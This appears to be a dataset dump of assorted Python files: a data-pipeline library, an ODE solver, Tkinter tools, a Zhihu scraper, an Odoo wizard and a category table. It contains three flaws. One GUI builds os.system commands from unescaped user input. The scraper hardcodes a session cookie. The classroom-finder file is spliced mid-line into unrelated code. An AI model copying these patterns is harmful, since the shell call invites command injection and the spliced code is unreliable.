List[Sequence[Any]]) -> None:\n self._datasets = datasets\n self._length = None\n\n def __iter__(self) -> Iterator[Tuple[Any]]:\n yield from zip(*self._datasets)\n\n def __getitem__(self, index: int) -> Tuple[Any]:\n if index < 0 or len(self) <= index:\n raise IndexError('RandomAccessZip object index out of range')\n return tuple(d[index] for d in self._datasets)\n\n def __len__(self) -> int:\n if self._length is None:\n self._length = min(len(d) for d in self._datasets)\n return self._length\n\n\nclass Dataset:\n def __init__(self,\n dataset: Sequence[Any]) -> None:\n self._dataset = dataset\n self._length = None\n\n def __iter__(self) -> Iterator[Any]:\n yield from self._dataset\n\n def __getitem__(self, index: Union[int, slice]) -> Any:\n if isinstance(index, slice):\n start, stop, step = index.indices(len(self))\n return [self.get_example(i) for i in range(start, stop, step)]\n return self.get_example(index)\n\n def __len__(self) -> int:\n if self._length is None:\n self._length = self.get_length()\n return self._length\n\n def __add__(self, other: 'Dataset') -> 'ConcatDataset':\n return ConcatDataset(self, other)\n\n def get_example(self, i: int) -> Any:\n return self._dataset[i]\n\n def get_length(self) -> int:\n return len(self._dataset)\n\n def map(self, map_func: Callable[[Any], Any]) -> 'MapDataset':\n return MapDataset(self, map_func)\n\n def all(self) -> List[Any]:\n return list(self)\n\n def take(self, n: int) -> List[Any]:\n return list(islice(self, n))\n\n def first(self) -> Any:\n return next(iter(self))\n\n def save(self, filename: str) -> 'CacheDataset':\n path = Path(filename)\n if path.exists():\n print(f'Loading data from {filename}...')\n with path.open('rb') as f:\n cache = pickle.load(f)\n else:\n if not path.parent.exists():\n path.parent.mkdir(parents=True)\n print(f'Saving data to {filename}...')\n cache = list(self)\n with path.open('wb') as f:\n pickle.dump(cache, f)\n return CacheDataset(self, cache)\n\n @staticmethod\n def load(filename: str) -> 'Dataset':\n warnings.warn(\n 'lineflow.Dataset.load is deprecated. Please refer to '\n 'lineflow.load.',\n DeprecationWarning,\n stacklevel=2)\n return lineflow_load(filename)\n\n\nclass ConcatDataset(Dataset):\n def __init__(self, *datasets: List[Dataset]) -> None:\n assert all(isinstance(d, Dataset) for d in datasets)\n\n super().__init__(RandomAccessConcat(*datasets))\n\n\nclass ZipDataset(Dataset):\n def __init__(self, *datasets: List[Dataset]) -> None:\n assert all(isinstance(d, Dataset) for d in datasets)\n\n super().__init__(RandomAccessZip(*datasets))\n\n\nclass MapDataset(Dataset):\n def __init__(self,\n dataset: Dataset,\n map_func: Callable[[Any], Any]) -> None:\n assert callable(map_func)\n\n if isinstance(dataset, MapDataset):\n funcs = copy.deepcopy(dataset._funcs)\n funcs.append(map_func)\n processed_funcs = copy.deepcopy(dataset._processed_funcs)\n else:\n funcs = [map_func]\n processed_funcs = []\n\n self._funcs = funcs\n self._processed_funcs = processed_funcs\n\n if isinstance(dataset, Dataset):\n dataset = dataset._dataset\n\n super().__init__(dataset)\n\n def __iter__(self) -> Iterator[Any]:\n for x in self._dataset:\n for f in self._funcs:\n x = f(x)\n yield x\n\n def get_example(self, i: int) -> Any:\n x = self._dataset[i]\n for f in self._funcs:\n x = f(x)\n return x\n\n\nclass CacheDataset(MapDataset):\n def __init__(self,\n dataset: Dataset,\n cache: List[Any]) -> None:\n if isinstance(dataset, MapDataset):\n funcs = copy.deepcopy(dataset._funcs)\n processed_funcs = funcs + copy.deepcopy(dataset._processed_funcs)\n else:\n processed_funcs = []\n\n self._funcs = []\n self._processed_funcs = processed_funcs\n self._cache = cache\n self._length = len(self._cache)\n\n super(MapDataset, self).__init__(cache)\n\n\ndef lineflow_concat(*datasets: List[Dataset]) -> ConcatDataset:\n return ConcatDataset(*datasets)\n\n\ndef lineflow_zip(*datasets: List[Dataset]) -> ZipDataset:\n return ZipDataset(*datasets)\n\n\ndef lineflow_filter(\n predicate: Callable[[Any], bool],\n dataset: Dataset,\n lazy: bool = False) -> Union[Iterator[Any], List[Any]]:\n iterator = filter(predicate, dataset)\n if lazy:\n return iterator\n else:\n return list(iterator)\n\n\ndef lineflow_flat_map(\n map_func: Callable[[Iterable[Any]], Any],\n dataset: Dataset,\n lazy: bool = False) -> Union[Iterator[Any], List[Any]]:\n iterator = chain.from_iterable(map(map_func, dataset))\n if lazy:\n return iterator\n else:\n return list(iterator)\n\n\ndef lineflow_load(filename: str) -> Dataset:\n print(f'Loading data from {filename}...')\n with open(filename, 'rb') as f:\n dataset = pickle.load(f)\n return Dataset(dataset)\n","sub_path":"lineflow/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"561551055","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nFecha de creación: Fri Oct 23 22:30:39 2015\n\nCreado por: antalcides\n\"\"\"\n\"\"\"\nSolve\ny^(4) + (4/x)y^3 = 0\nwith the boundary conditions\ny'(0) = y(0) = 0\ny\"(1) = 0\ny'''(1) = 1\nand plot y versus x.\n\n\"\"\"\nfrom numpy import zeros,array\nfrom run_kut5 import *\nfrom newtonRaphson2 import *\nfrom printSoln import *\ndef initCond(u):# Initial values of [y,y’,y\",y\"’];\n# use ’u’ if unknown\n return array([0.0, 0.0, u[0], u[1]])\ndef r(u):\n# Boundary condition residuals-- see Eq. (8.7)\n r = zeros(len(u))\n X,Y = integrate(F,x,initCond(u),xStop,h)\n y = Y[len(Y) - 1]\n r[0] = y[2]\n r[1] = y[3] - 1.0\n return r\ndef F(x,y): # First-order differential equations\n F = zeros(4)\n F[0] = y[1]\n F[1] = y[2]\n F[2] = y[3]\n if x == 0.0: F[3] = -12.0*y[1]*y[0]**2\n else: F[3] = -4.0*(y[0]**3)/x\n return F\nx = 0.0 # Start of integration\nxStop = 1.0 # End of integration\nu = array([-1.0, 1.0]) # Initial guess for u\nh = 0.05 # Initial step size\nfreq = 1 # Printout frequency\nu = newtonRaphson2(r,u,1.0e-5)\nX,Y = integrate(F,x,initCond(u),xStop,h)\nprintSoln(X,Y,freq)\nfrom pylab import*\nplot(X,Y[:,0],'-or')\n#plot(X,Y[:,1],'ob')\n#legend(('Y0', 'Y1'))\ngrid(True)\n\n","sub_path":"py/ej1_ode_newtonRaphson2.py","file_name":"ej1_ode_newtonRaphson2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"441132793","text":"# MINI PROJECT 4 START : 22.4.2019\nfrom Tkinter import *\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport mysearchengine\nfrom ttk import Combobox\nimport ttk\n\nclass Classroom:\n def __init__(self,building_No,floor_No,room_No):\n\n self.building_No = building_No\n self.floor_No = floor_No\n self.room_No = room_No\n self.traffic_Score = {}\n\n\n def get_distance_from(self,another_class_obj):\n\n bS = int(self.building_No)\n fS = int(self.floor_No)\n rS = int(self.room_No)\n\n totalCloseness = (abs(bS-int(another_class_obj.building_No))*100)+(abs(fS-int(another_class_obj.floor_No))*200)+(abs(rS-int(another_class_obj.room_No))*50)\n if totalCloseness == 0:\n totalCloseness = 100\n\n return totalCloseness\n\n\n\n\n\nclass Building:\n def __init__(self,b_name):\n self.b_name = b_name\n self.classrooms = []\n\nclass Day:\n def __init__(self,d_name):\n self.d_name = d_name\n self.timeSlots = {}\n\nclass SearchResultItem:\n def __init__(self,Classroom,closeness_score):\n self.Classroom = Classroom\n self.availability_score = 0.0\n self.closeness_score = closeness_score\n self.available_slots = [] # set of hours\n\n def compute_availability_score(self,wanted_timeInterval,wanted_Day,classDict,dayDict):\n\n start = int(wanted_timeInterval.split(\"-\")[0].split(\":\")[0])\n end = int(wanted_timeInterval.split(\"-\")[1].split(\":\")[0])\n wanted_hours = []\n\n for i in range(end-start):\n t = str(start+i)+\":\"+\"00\"\n wanted_hours.append(t)\n\n\n counter = 0\n slots = []\n for i in classDict:\n if classDict[i] == self.Classroom:\n wantedClass = i\n break\n for hour in wanted_hours:\n if wantedClass in dayDict[wanted_Day].timeSlots[hour]:\n counter += 1\n slots.append(hour)\n\n self.available_slots = slots\n\n wantedClassAvailablity = 100*(counter*60)/(len(wanted_hours)*60.0)\n\n self.availability_score = wantedClassAvailablity\n\n return wantedClassAvailablity\n\n\n\n\n\n\nclass Searcher:\n def __init__(self):\n self.Classes_Dict = {}\n self.Classroom_Distances = {}\n self.Days_Dict = {}\n self.Buildings_Dict = {}\n\n\n def fetch(self,link):\n\n urlsource = urllib2.urlopen(link)\n contents = urlsource.read()\n\n raw_data = BeautifulSoup(contents, features=\"html.parser\")\n\n allschedule = []\n\n self.BusyClasses = {}\n\n\n\n for i in raw_data.find_all(\"tr\"):\n if \"ACAD BUILD\" in str(i):\n lst = str(i).split('span style=\"font-size:8pt;\">')\n lstt = []\n for m in lst:\n if \"
\")[0]:\n lstt.append(m.split(\"\")[0].split(\",\"))\n allschedule.append(lstt)\n\n self.whatI_need = []\n for i in allschedule:\n classs = []\n days = i[-4][0].split(\" \\r\\n\")\n classs.append(days)\n\n hours = i[-3][0].split(\" \\r\\n\")\n classs.append(hours)\n\n room = i[-2][0].split(\"#\")[1].split(\" \\r\\n\")[0]\n classs.append([room])\n\n self.whatI_need.append(classs)\n\n\n for c in self.whatI_need:\n\n\n for eeachDay in c[0]:\n\n if len(c[0]) == 2 and len(c[1]) == 1:\n\n eachDay = eeachDay.strip()\n if eachDay != \"Saturday\":\n self.BusyClasses.setdefault(eachDay, {})\n self.BusyClasses[eachDay].setdefault(c[2][0], [])\n\n which_hours = []\n\n h = c[1][0].split(\"-\")\n h_1 = int(h[0].split(\":\")[0])\n h_2 = int(h[1].split(\":\")[0])\n total = (h_2 - h_1)\n for p in range(total):\n v = float(h_1 + p)\n which_hours.append(v)\n for v in which_hours:\n if v not in self.BusyClasses[eachDay][c[2][0]] and v < 19.0:\n self.BusyClasses[eachDay][c[2][0]].append(v)\n self.BusyClasses[eachDay][c[2][0]].sort()\n\n else:\n eachDay = eeachDay.strip()\n if eachDay != \"Saturday\":\n self.BusyClasses.setdefault(eachDay,{})\n self.BusyClasses[eachDay].setdefault(c[2][0],[])\n\n which_hours = []\n index = c[0].index(eeachDay)\n h = c[1][index].split(\"-\")\n h_1 = int(h[0].split(\":\")[0])\n h_2 = int(h[1].split(\":\")[0])\n total = (h_2-h_1)\n for p in range(total):\n v = float(h_1+p)\n which_hours.append(v)\n for v in which_hours:\n if v not in self.BusyClasses[eachDay][c[2][0]] and v<19.0:\n self.BusyClasses[eachDay][c[2][0]].append(v)\n self.BusyClasses[eachDay][c[2][0]].sort()\n\n for n in self.Classes_Dict:\n for ddd in self.BusyClasses:\n if n not in self.BusyClasses[ddd]:\n self.BusyClasses[ddd][n] = []\n\n for dday in c[0]:\n day = dday.strip()\n if day != \"Saturday\":\n day = Day(day)\n self.Days_Dict.setdefault(day.d_name,day)\n self.allTimeSlots = [09.0,10.0,11.0,12.0,13.0,14.0,15.0,16.0,17.0,18.0]\n for t in self.allTimeSlots:\n day.timeSlots[str(int(t))+\":00\"] = []\n\n\n for Number in c[2]:\n try:\n allNo = Number[:]\n bNo = Number[0]\n fNo = Number[1]\n rNo = Number[2:].split(\" \", self.roomComboboxClick)\n\n\n self.startLabel = Label(self.frame1,text=\"Start\")\n self.startCombobox = Combobox(self.frame1,width=6)\n self.startCombobox['values'] = [\"09:00\",\"10:00\",\"11:00\",\"12:00\",\"13:00\",\"14:00\",\"15:00\",\"16:00\",\"17:00\",\"18:00\"]\n self.startCombobox.current(0)\n\n self.endLabel = Label(self.frame1,text=\"End\")\n self.endCombobox = Combobox(self.frame1,width=6)\n self.endCombobox['values'] = [\"10:00\",\"11:00\",\"12:00\",\"13:00\",\"14:00\",\"15:00\",\"16:00\",\"17:00\",\"18:00\",\"19:00\"]\n self.endCombobox.current(9)\n\n self.dayLabel = Label(self.frame1,text=\"Day\",anchor = E)\n self.dayCombobox = Combobox(self.frame1)\n\n\n\n self.searchButton = Button(self.frame1,text=\"Search\",command= self.searchButtonC,width=8)\n\n self.treeview = ttk.Treeview(self.frame2)\n self.treeview['columns'] = ('Room', 'Traffic', 'Availablity %','Closeness','Overall Score')\n self.treeview.heading('Room', text='Room', anchor=CENTER)\n self.treeview.heading('Traffic', text='Traffic', anchor=CENTER)\n self.treeview.heading('Availablity %', text='Availablity %', anchor=CENTER)\n self.treeview.heading('Closeness', text='Closeness', anchor=CENTER)\n self.treeview.heading('Overall Score', text='Overall Score', anchor=CENTER)\n\n self.treeview.column('#00', anchor=W, minwidth=00, stretch=0, width=0)\n\n self.treeview.column('#01', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#02', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#03', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#04', anchor=W, minwidth=50, stretch=1, width=80)\n self.treeview.column('#05', anchor=W, minwidth=50, stretch=1, width=80)\n\n self.vsbar = Scrollbar(self.frame2, orient=VERTICAL)\n self.vsbar.config(command=self.treeview.yview)\n self.treeview.config(yscrollcommand=self.vsbar.set)\n\n\n\n # PACKING\n self.mainTitle.grid(row=0,column=0,sticky=EW)\n\n self.frame0.grid(row=1, column=0, sticky=E + W + N, pady= 10)\n self.frame1.grid(row=2, column=0, sticky=E + W + S,padx=5)\n self.frame2.grid(row=0, column=4, rowspan=4,pady=5,padx=5)\n\n self.urlLabel.grid(row=0, column=0)\n self.urlEntry.grid(row=0, column=1,sticky= E+W)\n\n self.colorLabel.grid(row=1,column=0, columnspan = 2, sticky=E,padx=(0,70),pady=5)\n self.fetchButton.grid(row=1,column=1,sticky=E,pady=5)\n\n self.filtersLabel.grid(row=2,column=0,padx=5)\n\n self.whereAmILabel.grid(row=0, column=0)\n self.whereAmILabelCombobox.grid(row=0, column=1)\n\n self.roomLabel.grid(row=1, column=0)\n self.roomCombobox.grid(row=1, column=1)\n\n self.startLabel.grid(row=2, column=0)\n self.startCombobox.grid(row=2, column=1,sticky=W)\n\n self.endLabel.grid(row=2, column=2,sticky=W,columnspan = 1)\n self.endCombobox.grid(row=2, column=3)\n\n self.dayLabel.grid(row=3, column=0)\n self.dayCombobox.grid(row=3, column=1)\n\n self.searchButton.grid(row=4, column=0,pady=(0,5))\n\n self.resultsTitle.grid(row=0,column=0,columnspan=2,sticky=E+W)\n self.treeview.grid(row=1, column=0,padx=(5,0),pady=5)\n self.vsbar.grid(row=1,column=1,sticky=S+N+W ,padx=(0,5),pady=5)\n\n def roomComboboxClick(self,event):\n try:\n building = self.whereAmILabelCombobox.get().split(\" \")[2]\n rooms = [room[1:] for room in self.SearcherObj.Classes_Dict if room[0] == building]\n rooms.sort()\n\n self.roomCombobox['values'] = rooms\n self.roomCombobox.current(0)\n\n except:\n pass\n\n def fetchButtonC(self):\n\n try:\n self.colorLabel.config(bg=\"yellow\")\n self.colorLabel.update()\n\n link = self.urlEntry.get()\n self.SearcherObj.fetch(link)\n buildings = [\"ACAD BUILD \"+i for i in self.SearcherObj.Buildings_Dict.keys()]\n buildings.sort()\n self.whereAmILabelCombobox['values'] = buildings\n self.whereAmILabelCombobox.current(0)\n self.roomComboboxClick(event=1)\n self.dayCombobox['values'] = self.SearcherObj.Days_Dict.keys()\n self.dayCombobox.current(0)\n\n self.colorLabel.config(bg=\"green\")\n except:\n pass\n\n def searchButtonC(self):\n\n try:\n whereAmI = (self.whereAmILabelCombobox.get()+self.roomCombobox.get()).split(\" \")[2]\n self.SearcherObj.compute_closeness_scores(whereAmI)\n\n self.SearcherObj.search(self.startCombobox.get()+\"-\"+self.endCombobox.get(),self.dayCombobox.get())\n\n self.SearcherObj.overall_score(self.dayCombobox.get())\n for i in self.treeview.get_children():\n self.treeview.delete(i)\n for r in self.SearcherObj.overall_scores:\n cls = r[1]\n\n self.treeview.insert('', 'end', values=[cls,\n round(self.SearcherObj.normalized_tScores[cls],4),\n round(self.SearcherObj.normalized_aScores[cls],4),\n round(self.SearcherObj.normalized_cScores[cls],4),\n r[0]])\n except:\n pass\n\ndef main():\n root = Tk()\n root.title(\"Empty Class for Sehirian\")\n root.geometry(\"766x500+490+50\")\n app = ECF_GUI(root)\n root.mainloop()\n\nmain()\n","sub_path":"EmptyClassroomFinderForSehirian.py","file_name":"EmptyClassroomFinderForSehirian.py","file_ext":"py","file_size_in_byte":17256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"418816703","text":"import os\nimport json\n\narr = os.listdir('./meme_data_2')\narr_result = []\nfor item in arr:\n print(item)\n if item != '.DS_Store':\n with open('./meme_data_2/'+ item, 'r') as image_file:\n arr_result.append({'image':'https://nielsezeka.github.io/data/meme_data_2/'+ item});\njson_string = json.dumps(arr_result)\nf = open(\"huge_pack_pexel.json\", \"a\")\nf.write(json_string)\nf.close()","sub_path":"data/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"211197148","text":"# -*- coding: utf-8 -*-\nfrom openerp.exceptions import Warning\nfrom openerp import models, fields, api\nfrom odoo import exceptions\n\nclass HrEmployeeUserAccessWizard(models.TransientModel):\n _name = 'employee.assign.user'\n\n notification = fields.Char('Notification')\n user_id = fields.Many2one('res.users','Users')\n\n @api.multi\n def action_assign_user(self):\n view_ref = self.env.ref('base.view_users_form')\n view_id = view_ref and view_ref.id or False,\n return {\n 'name': 'Assign Access For User',\n 'res_id': self.user_id.id,\n 'view_type': 'form',\n \"view_mode\": 'form',\n 'res_model': 'res.users',\n 'view_id':view_id,\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n\nHrEmployeeUserAccessWizard()","sub_path":"beta-dev1/biocare_field_modifier/wizard/assign_acesss_user.py","file_name":"assign_acesss_user.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"601029986","text":"for i in range(3):#0 1 2\n account = input(\"请输入账号\")\n pwd = int(input(\"请输入密码\"))\n if account != \"laowang\" or pwd != 123456:\n if i == 2:\n print(\"账号已经冻结\")\n else:\n print(\"重新输入\")\n else:\n num = int(input(\"请选择英雄 0-ADC 1-肉 2-法师\"))\n if num == 0:\n print(\"鲁班大师\")\n elif num == 1:\n print(\"陈咬金\")\n elif num == 2:\n print(\"王昭君\")\n else:\n print(\"I guest you are a single dog\")\n\n break#退出循环\n\n","sub_path":"10day/01-王者荣耀登录三次版本.py","file_name":"01-王者荣耀登录三次版本.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"386850724","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nimport os\r\n\r\nroot=Tk()\r\nmainframe = ttk.Frame(root, padding=\"10 10 12 12\")\r\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\r\nmainframe.columnconfigure(0, weight=1)\r\nmainframe.rowconfigure(0, weight=1)\r\n\r\n\r\nfilename=StringVar() # Value saved here\r\nTrain=StringVar() # Value saved here\r\nTest=StringVar() # Value saved here\r\nRegression=StringVar() # Value saved here\r\nHeader=StringVar() # Value saved here\r\ndataStart=StringVar() # Value saved here\r\nOutput=StringVar() # Value saved here\r\ndataEnd=StringVar()\r\nWD=StringVar()\r\n\r\ndef search():\r\n path = filename.get()\r\n End = int(dataEnd.get())\r\n Start = int(dataStart.get())\r\n Resultspath = Output.get()\r\n isRegress = Regression.get()\r\n isHeader = Header.get()\r\n trainset = Train.get()\r\n testset = Test.get()\r\n Cwd = WD.get()\r\n Cutoffphq = [10]\r\n Balancing = ['up', 'down']\r\n if Cwd != \"here\":\r\n os.chdir(Cwd)\r\n clfModels = ['kNN','LR', 'ADA', 'RF', 'SVC', 'XGB', 'NN' ]\r\n regModels = ['kNN', 'LR', 'ADA', 'RF']\r\n if isRegress == \"no\":\r\n for i in Balancing:\r\n Bal = i\r\n for a in Cutoffphq:\r\n cuttoff = a\r\n for j in clfModels:\r\n model = j\r\n args = 'python analyzer2.py --filename {} --dataStart {} --dataEnd {} --resampleType {} --doFeatureSelection \"True\" --modelType {} --targetData -1 --cutoff {} --printResultHeader {} --optimizeFor f1 --Regression {} --Train {} --Test {} >> {} '.format(\r\n path, Start, End, Bal, model, cuttoff,isHeader, isRegress, trainset, testset, Resultspath)\r\n os.system(args)\r\n print('1 Iteration done')\r\n\r\n elif isRegress == \"yes\":\r\n for j in regModels:\r\n model = j\r\n args = 'python analyzer2.py --filename {} --dataStart {} --dataEnd {} --doFeatureSelection False --regModel {} --targetData -1 --printResultHeader {} --optimizeFor f1 --Train {} --Test {} >> {} '.format(\r\n path, Start, End, model, isHeader, trainset, testset, Resultspath)\r\n os.system(args)\r\n print('1 Iteration done')\r\n\r\n print('Run Completed')\r\n root.destroy()\r\n\r\n return ''\r\n\r\nttk.Entry(mainframe, width=30, textvariable=filename).grid(column=2, row=1)\r\nttk.Entry(mainframe, width=30, textvariable=Test).grid(column=2, row=2)\r\nttk.Entry(mainframe, width=30, textvariable=Train).grid(column=2, row=3)\r\nttk.Entry(mainframe, width=30, textvariable=dataStart).grid(column=2, row=4)\r\nttk.Entry(mainframe, width=30, textvariable=dataEnd).grid(column=2, row=5)\r\nttk.Entry(mainframe, width=30, textvariable=Header).grid(column=2, row=6)\r\nttk.Entry(mainframe, width=30, textvariable=Regression).grid(column=2, row=7)\r\nttk.Entry(mainframe, width=30, textvariable=Output).grid(column=2, row=8)\r\nttk.Entry(mainframe, width=30, textvariable=WD).grid(column=2, row=9)\r\n\r\nttk.Label(mainframe, text=\"filepath\").grid(column=1, row=1)\r\nttk.Label(mainframe, text=\"Testing Set(.csv)\").grid(column=1, row=2)\r\nttk.Label(mainframe, text=\"Training Set(.csv)\").grid(column=1, row=3)\r\nttk.Label(mainframe, text=\"dataStart (col of csv file)\").grid(column=1, row=4)\r\nttk.Label(mainframe, text=\"dataEnd (col of csv file)\").grid(column=1, row=5)\r\nttk.Label(mainframe, text=\"Print Header Tag for values in output file(True/False)\").grid(column=1, row=6)\r\nttk.Label(mainframe, text=\"Regression (yes/no)\").grid(column=1, row=7)\r\nttk.Label(mainframe, text=\"Output destination(.csv)\").grid(column=1, row=8)\r\nttk.Label(mainframe, text=\"Working Directory(input here for current dir)\").grid(column=1, row=9)\r\n\r\n\r\nttk.Button(mainframe, text=\"Run\", command=search).grid(column=2, row=13)\r\n\r\nroot.mainloop()","sub_path":"MachineLearning.py","file_name":"MachineLearning.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"25738494","text":"import redis\nimport time\nimport proxy\n\nr = redis.Redis(host='redis', port=6379)\n\ndef set_a_proxy(proxy):\n r.set('proxy', proxy, ex=60)\n\ndef get_a_proxy():\n try:\n proxy = r['proxy']\n return proxy, 'ok'\n except:\n return 'get proxy failed', 'failed'\n\ndef get_redis_proxy():\n proxy_url, status = get_a_proxy()\n if(status == 'ok'):\n return proxy_url\n else:\n a_proxy = proxy.get_a_proxy()\n set_a_proxy(a_proxy)\n print('set proxy succeed {}'.format(a_proxy))\n return a_proxy\n\nif __name__ == '__main__':\n print(get_redis_proxy())","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"495084445","text":"# title time ans_num foc_num site\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport time as tm\nimport re\n\nurls = ['https://www.zhihu.com/people/yan-xi-5-31/following/questions?page={}'.format(str(i)) for i in range(1, 22)]\nheaders = {\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'aliyungf_tc=AQAAALlHnAa9hwYAgxkFajTTLlmNTUws; d_c0=\"AEBthFTRMA2PTl_q8JcaDUEOWBCASvcN_Fo=|1519394399\"; _xsrf=59a447e1-9a1f-4b04-b72a-46d1593e8b9c; q_c1=f20a23e1db6641b2af6c9ee3d1f65a8f|1519394399000|1519394399000; _zap=770526c5-761f-49c1-8d14-d04a42640566',\n 'Host': 'www.zhihu.com',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'\n}\n\n\ndef get_info(url):\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.text, 'lxml')\n titles = soup.select('div.QuestionItem-title > a')\n times = soup.find_all(text=re.compile(r'\\d{4}-\\d{2}-\\d{2}'))\n ans_nums = soup.find_all(text=re.compile(\"个回答\"))\n foc_nums = soup.find_all(text=re.compile(\"个关注\"))\n sites = soup.select('div.QuestionItem-title > a')\n\n for title, time, ans_num, foc_num, site in zip(titles, times, ans_nums, foc_nums, sites):\n def f(all):\n sum = 0\n for i, a in enumerate(all):\n sum = sum + pow(1000, len(all) - i - 1) * int(a)\n return sum\n\n data = {\n 'title': title.get_text(),\n 'time': time,\n 'ans_num': f(re.findall(r'\\d+', ans_num)),\n 'foc_num': f(re.findall(r'\\d+', foc_num)),\n 'site': 'https://www.zhihu.com' + site.get('href')\n }\n print(data)\n tm.sleep(4)\n\nget_info('https://www.zhihu.com/people/yan-xi-5-31/following/questions?page=1')\n","sub_path":"code/zhihu.py","file_name":"zhihu.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"180610344","text":"#-*- coding:utf-8 -*-\n__author__ = 'sisobus'\nimport commands\nimport os\nimport json\n\nALLOWED_EXTENSIONS = set(['txt','pdf','png','jpg','JPG','jpeg','JPEG','gif','GIF','zip'])\n\ndef allowedFile(filename):\n return '.' in filename and filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS\n\ndef createDirectory(directoryName):\n if not os.path.exists(directoryName):\n command = 'mkdir %s'%directoryName\n ret = commands.getoutput(command)\n command = 'chmod 777 %s'%directoryName\n ret = commands.getoutput(command)\n\ndef get_image_path(real_image_path):\n ret = ''\n for t in real_image_path.lstrip().rstrip().split('/')[6:]: ret=ret+t+'/'\n return ret[:-1]\n\ndef get_shop_category_dictionary():\n d = {\n1:'거실가구',\n'거실가구':1,\n2:'소파',\n'소파':2,\n3:'소파테이블',\n'소파테이블':3,\n4:'사이드테이블',\n'사이드테이블':4,\n5:'TV스탠드',\n'TV스탠드':5,\n6:'거실수납장',\n'거실수납장':6,\n7:'거실조명',\n'거실조명':7,\n8:'거실카페트',\n'거실카페트':8,\n9:'주방가구',\n'주방가구':9,\n10:'식탁',\n'식탁':10,\n11:'의자',\n'의자':11,\n12:'수납장',\n'수납장':12,\n13:'소가구',\n'소가구':13,\n14:'기타',\n'기타':14,\n15:'침실가구',\n'침실가구':15,\n16:'침대',\n'침대':16,\n17:'매트리스',\n'매트리스':17,\n18:'옷장',\n'옷장':18,\n19:'수납장',\n'수납장':19,\n20:'화장대',\n'화장대':20,\n21:'침실조명',\n'침실조명':21,\n22:'침구류',\n'침구류':22,\n23:'소가구',\n'소가구':23,\n24:'카페트',\n'카페트':24,\n25:'기타',\n'기타':25,\n26:'서재가구',\n'서재가구':26,\n27:'책상/테이블',\n'책상/테이블':27,\n28:'사무용 의자',\n'사무용 의자':28,\n29:'책장',\n'책장':29,\n30:'수납장',\n'수납장':30,\n31:'소가구',\n'소가구':31,\n32:'기타',\n'기타':32,\n33:'유아-주니어가구',\n'유아-주니어가구':33,\n34:'침대',\n'침대':34,\n35:'매트리스',\n'매트리스':35,\n36:'옷장/서랍장',\n'옷장/서랍장':36,\n37:'수납장',\n'수납장':37,\n38:'책상',\n'책상':38,\n39:'책장',\n'책장':39,\n40:'소가구',\n'소가구':40,\n41:'기타',\n'기타':41,\n42:'욕실',\n'욕실':42,\n43:'세면대',\n'세면대':43,\n44:'욕실수납',\n'욕실수납':44,\n45:'수도꼭지',\n'수도꼭지':45,\n46:'도기',\n'도기':46,\n47:'욕실용품',\n'욕실용품':47,\n48:'욕실조명',\n'욕실조명':48,\n49:'기타',\n'기타':49,\n50:'제작가구',\n'제작가구':50,\n51:'주방가구',\n'주방가구':51,\n52:'붙박이장',\n'붙박이장':52,\n53:'현관장',\n'현관장':53,\n54:'화장실가구',\n'화장실가구':54,\n55:'기타',\n'기타':55,\n56:'인테리어 소품',\n'인테리어 소품':56,\n57:'페브릭',\n'페브릭':57,\n58:'테이블웨어',\n'테이블웨어':58,\n59:'홈데코',\n'홈데코':59,\n60:'생활용품',\n'생활용품':60,\n61:'조명',\n'조명':61,\n62:'기타',\n'기타':62,\n63:'상업가구',\n'상업가구':63,\n64:'테이블',\n'테이블':64,\n65:'소파',\n'소파':65,\n66:'의자',\n'의자':66,\n67:'수납장',\n'수납장':67,\n68:'기타',\n'기타':68,\n69:'사무가구',\n'사무가구':69,\n70:'사무용 책상',\n'사무용 책상':70,\n71:'사무용 의자',\n'사무용 의자':71,\n72:'회의용 테이블',\n'회의용 테이블':72,\n73:'회의용 의자',\n'회의용 의자':73,\n74:'기타',\n'기타':74,\n }\n return d\n\ndef get_shop_category_list():\n shop_category_dict = get_shop_category_dictionary()\n l = []\n for i in xrange(1,75,1):\n cur = (str(i), shop_category_dict[i])\n l.append(cur)\n return l\n\ndef get_shop_category_1st_list():\n ret = [1,9,15,26,33,42,50,56,63,69]\n return ret\n\ndef get_shop_category_2nd_list():\n ret = []\n shop_category_1st_list = get_shop_category_1st_list()\n for i in xrange(1,75,1):\n if i in shop_category_1st_list:\n continue\n ret.append(i)\n return ret\n\ndef get_shop_category_tree():\n shop_category_1st_list = get_shop_category_1st_list()\n ret = [ [] for i in 